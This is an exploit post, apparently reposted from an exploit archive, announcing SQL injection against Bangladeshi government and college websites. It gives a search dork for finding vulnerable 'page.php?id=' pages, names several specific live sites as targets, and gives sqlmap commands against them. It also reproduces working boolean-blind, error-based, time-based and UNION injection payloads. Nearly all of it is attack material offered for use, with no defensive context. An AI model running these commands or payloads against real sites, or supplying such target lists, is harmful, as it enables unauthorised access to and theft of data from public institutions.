Information Exploit
[+] Exploit Title : Bangladesh Web site:bd SQL Injection
[+] Author : Bl4ck M4n
[+] Vendor Home: http://exploreit.com.bd/ Technical Assistance explore IT
[+] Dork : inurl:"page.php?id=" site:bd
[+] Tested on : BackBox 5.1, Chrome
On Target :
- http://www.rangamaticollege.gov.bd/page.php?id=11
- http://mirpurcollege.edu.bd/page.php?id=8
- http://gsacollege.edu.bd/page.php?id=27
- http://laxmipurgovtcollege.edu.bd/page.php?id=3
[+] Poc SQL :
- sqlmap -u "http://laxmipurgovtcollege.edu.bd/page.php?id=3" --dbs
- sqlmap -u "http://www.gdc.gov.bd/page.php?id=2" --dbs
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10' AND 2605=2605 AND 'cgRU'='cgRU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
(FLOOR)
Payload: id=10' AND (SELECT 6597 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(6597=6597,1))),0x716b7a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'iBFB'='iBFB
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5) AND 'NnlV'='NnlV
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=10' UNION ALL SELECT
NULL,CONCAT(0x716b627a71,0x706e757375635a567877537a5472427650546a634f5050666174796d616347447a6455584b774264,0x716b7a7071),NULL,NULL,NULL,NULL-- IsIV
database
vulnerability
data user
Video tutorial
Sumber Exploit : [cxsecurity.com]
0 Comments